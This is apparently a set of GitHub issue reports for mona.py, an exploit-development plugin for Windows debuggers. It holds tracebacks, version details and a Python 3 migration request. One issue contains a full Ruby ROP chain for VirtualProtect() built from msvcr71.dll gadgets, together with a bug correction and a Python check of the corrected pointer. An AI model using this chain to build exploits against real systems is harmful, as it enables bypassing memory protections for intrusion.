found_opcodes = searchInModule(search,thismodule,criteria)
File "mona.py", line 5334, in searchInModule
return searchInRange(sequences, start, end, criteria)
File "mona.py", line 5214, in searchInRange
dbg.getMemoryPages()
File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages
size = int(info[3].replace('`', ''), base=16)
ValueError: invalid literal for int() with base 16: 'MEM_IMAGE'


Other useful information (mona version, debugger & debugger version, OS version, etc)

windbg6.12
windows7 Pro
mshtml ver: File version: 8.0.7600.16385

Errors running !py mona rop

I'm trying to see if Mona has installed correctly by running simple commands against Notepad++. Below is the output that Mona gives me when I run the rop command (other commands that need module information appear to give similar output). This is on Windows 8.1 x64 (running a 32bit debugger).

0:009> !py mona rop
Hold on...
[+] Command used:
!py C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py rop

---------- Mona command started on 2015-05-02 13:15:18 (v2.0, rev 557) ----------
[+] Processing arguments and criteria
- Pointer access level : X
[+] Generating module info table, hang on...
- Processing modules
** Error trying to process module image74150000
** Error trying to process module image00400000
** Error trying to process module kernel.appcore.dll


Traceback (most recent call last):
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 17996, in main
commands[command].parseProc(opts)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 11257, in procROP
findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5961, in findROPGADGETS
modulestosearch = getModulesToQuery(modulecriteria)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5373, in getModulesToQuery
populateModuleInfo()
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 5488, in populateModuleInfo
thismod = MnModule(key)
File "C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x86\mona.py", line 2493, in init
mzbase = mod.getBaseAddress()
AttributeError: 'NoneType' object has no attribute 'getBaseAddress'


Wrong Calculation of ROP chain

Hi,

I used the latest version of mona.py and had a bug when calculating the return address to VirtualProtect: it forgot to account for an add al,0EFh that will occur before the VirtualProtect call.

Thanks for the helpful tool though,
Gadi

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

*** [ Ruby ] ***

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be
rop_gadgets = 
[
  0x7c373fda,  # POP EBP # RETN [msvcr71.dll] 
  0x7c373fda,  # skip 4 bytes [msvcr71.dll]
  0x7c376747,  # POP EAX # RETN [msvcr71.dll] 
  0xfffffdff,  # Value to negate, will become 0x00000201
  0x7c352155,  # NEG EAX # RETN [msvcr71.dll] 
  0x7c341748,  # POP EBX # RETN [msvcr71.dll] 
  0xffffffff,  #  
  0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll] 
  0x7c363cff,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
  0x7c344f8e,  # POP EDX # RETN [msvcr71.dll] 
  0xffffffc0,  # Value to negate, will become 0x00000040
  0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll] 
  0x7c34f7a0,  # POP ECX # RETN [msvcr71.dll] 
  0x7c38fd9f,  # &Writable location [msvcr71.dll]
  0x7c342953,  # POP EDI # RETN [msvcr71.dll] 
  0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
  0x7c36374d,  # POP ESI # RETN [msvcr71.dll] 
  0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
  0x7c34728e,  # POP EAX # RETN [msvcr71.dll] 
  0x7c37a140,  # ptr to &VirtualProtect() [IAT msvcr71.dll]   ---- BUG Error should be 7c37a151  ( will get eax to 0x7c37a140 when  add     al,0EFh; )
  0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
  0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
].flatten.pack("V*")

Mona version:

$Revision: 545 $
$Id: mona.py 545 2014-02-22 22:46:02Z corelanc0d3r $
"""

VERSION = '2.0'
REV = filter(str.isdigit, '$Revision: 545 $')
IMM = '1.8'
DEBUGGERAPP = ''
arch = 32
win7mode = False
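As an added check (not part of mona.py or of the issue above), a small model of the partial-register write that ADD AL, imm8 performs, used to show what JMP [EAX] would actually dereference after the PUSHAD # ADD AL,0EF # RETN gadget and what POP EAX has to load so that EAX ends at the intended IAT pointer. The values are the ones quoted in the issue; the function names are my own.

```python
def add_al(eax, imm8):
    """Model x86 ADD AL, imm8: only the low byte of EAX changes; the carry
    out of bit 7 goes to EFLAGS and is never propagated into AH."""
    return (eax & 0xFFFFFF00) | ((eax + imm8) & 0xFF)


def compensate_add_al(target, imm8):
    """Inverse of add_al: the value a preceding POP EAX must load so that
    ADD AL, imm8 leaves EAX equal to `target` (8-bit wrap-around subtraction)."""
    return (target & 0xFFFFFF00) | (((target & 0xFF) - imm8) & 0xFF)


def check_iat_pointer(popped_eax, imm8, iat_ptr):
    """Verify a generated chain: return (eax_at_jmp, ok, corrected) where
    eax_at_jmp is what JMP [EAX] dereferences after the gadget's side effect,
    ok says whether that equals the IAT pointer, and corrected is the value
    the chain should have emitted instead of popped_eax."""
    eax_at_jmp = add_al(popped_eax, imm8)
    return eax_at_jmp, eax_at_jmp == iat_ptr, compensate_add_al(iat_ptr, imm8)


if __name__ == "__main__":
    # Values from the issue: chain pops 0x7c37a140 (ptr to &VirtualProtect in
    # the msvcr71.dll IAT), then the PUSHAD gadget executes ADD AL,0EF.
    print(check_iat_pointer(0x7c37a140, 0xEF, 0x7c37a140))
    # → (0x7c37a12f, False, 0x7c37a151): EAX lands 0x11 bytes short of the
    #   IAT entry, and 0x7c37a151 is the value that survives the ADD correctly.
```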

Migrate to Python3

When opening a new issue, please fill out the following sections:

Expected behavior

Code is written in Python 3.

Actual behavior

Code is written in Python 2.7.

Steps to reproduce the problem

Check dependencies in README.md file.

Other useful information (mona version, debugger & debugger version, OS version, etc)

Python 2.7 is EOL as of 9 days ago (01/01/2020).

See: https://pythonclock.org

jmp esp error Windows XP

Expected behavior

  • Mona should provide the output of the instruction jmp esp upon executing !mona jmp -r esp

Actual behavior

  • Mona errors out, as shown in the attached screenshot

Steps to reproduce the problem

  • Open Immunity debugger and load mona.py
  • Search for jmp esp instruction with !mona jmp -r esp command and observe the output

Other useful information (mona version, debugger & debugger version, OS version, etc)

  • Windows Version: XP
  • Immunity Debugger Version: 1.85
  • Mona Version: Latest Patch
  • Python Version: 2.7.18
  • Other mona commands work; !mona find -s '\xff\xe4' works fine
